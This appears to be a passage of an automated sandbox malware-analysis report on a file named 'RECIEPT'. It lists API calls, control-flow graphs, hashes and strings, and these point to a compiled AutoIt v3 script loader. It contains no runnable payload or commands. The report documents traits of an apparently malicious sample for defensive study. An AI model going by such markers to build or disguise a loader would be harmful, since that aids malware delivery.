                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 440038798-2785691316
                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2001->2019 2002->2001 2009 427698-4276a8 2002->2009 2003->2001 2011 427636-427640 2004->2011 2012 42762b-427631 2004->2012 2007 40e5a5-40e5ae 2005->2007 2008 427654-427657 2005->2008 2013 40e5b4 2007->2013 2014 427645-42764f 2007->2014 2008->2000 2020 42765d-42766f 2008->2020 2015 4276b0 2009->2015 2016 4276aa-4276ae 2009->2016 2011->2000 2012->2000 2013->2000 2014->2000 2015->2001 2016->2001 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2030 40e5e8 2018->2030 2019->2023 2020->2000 2022->2019 2027 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2027 2032 40e641-40e642 FreeLibrary 2027->2032 2033 40e644-40e651 2027->2033 2030->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                        • String ID: 0SH$v
                                        • API String ID: 3363477735-350888836
                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                        APIs
                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsThemeActive$uxtheme.dll
                                        • API String ID: 2574300362-3542929980
                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FreeInfoLibraryParametersSystem
                                        • String ID: v
                                        • API String ID: 3403648963-2904040280
                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                        • TranslateMessage.USER32(?), ref: 00409556
                                        • DispatchMessageW.USER32(?), ref: 00409561
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchSleepTranslate
                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                        • API String ID: 1762048999-758534266
                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • __wcsicoll.LIBCMT ref: 00402007
                                        • __wcsicoll.LIBCMT ref: 0040201D
                                        • __wcsicoll.LIBCMT ref: 00402033
                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                        • __wcsicoll.LIBCMT ref: 00402049
                                        • _wcscpy.LIBCMT ref: 0040207C
                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                        • API String ID: 3948761352-1609664196
                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                        • _wcsncat.LIBCMT ref: 0040E433
                                        • __wmakepath.LIBCMT ref: 0040E44F
                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • _wcscpy.LIBCMT ref: 0040E487
                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                        • _wcscat.LIBCMT ref: 00427541
                                        • _wcslen.LIBCMT ref: 00427551
                                        • _wcslen.LIBCMT ref: 00427562
                                        • _wcscat.LIBCMT ref: 0042757C
                                        • _wcsncpy.LIBCMT ref: 004275BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                        • String ID: Include$\
                                        • API String ID: 3173733714-3429789819
                                        • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                        • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                        Control-flow Graph

                                        APIs
                                        • _fseek.LIBCMT ref: 0045292B
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                        • __fread_nolock.LIBCMT ref: 00452961
                                        • __fread_nolock.LIBCMT ref: 00452971
                                        • __fread_nolock.LIBCMT ref: 0045298A
                                        • __fread_nolock.LIBCMT ref: 004529A5
                                        • _fseek.LIBCMT ref: 004529BF
                                        • _malloc.LIBCMT ref: 004529CA
                                        • _malloc.LIBCMT ref: 004529D6
                                        • __fread_nolock.LIBCMT ref: 004529E7
                                        • _free.LIBCMT ref: 00452A17
                                        • _free.LIBCMT ref: 00452A20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                        • String ID:
                                        • API String ID: 1255752989-0
                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_fseek_wcscpy
                                        • String ID: FILE
                                        • API String ID: 3888824918-3121273764
                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                        • ImageList_ReplaceIcon.COMCTL32(009651C8,000000FF,00000000), ref: 00410552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009651C8,000000FF,00000000), ref: 00410552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _malloc
                                        • String ID: Default
                                        • API String ID: 1579825452-753088835
                                        • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                        • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2052 40f696-40f69c 2048->2052 2050 40f660-40f674 call 4150d1 2049->2050 2051 40f63e 2049->2051 2056 40f679-40f67c 2050->2056 2053 40f640 2051->2053 2055 40f642-40f650 2053->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2050 2059->2053 2073 425d43-425d5f call 414d30 2060->2073 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2066 425d16 2064->2066 2067 40f6c8-40f6d6 2064->2067 2065->2057 2066->2060 2069 425d05-425d0b 2067->2069 2070 40f6dc-40f6df 2067->2070 2069->2055 2072 425d11 2069->2072 2070->2057 2072->2066 2073->2052
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                        • String ID: AU3!$EA06
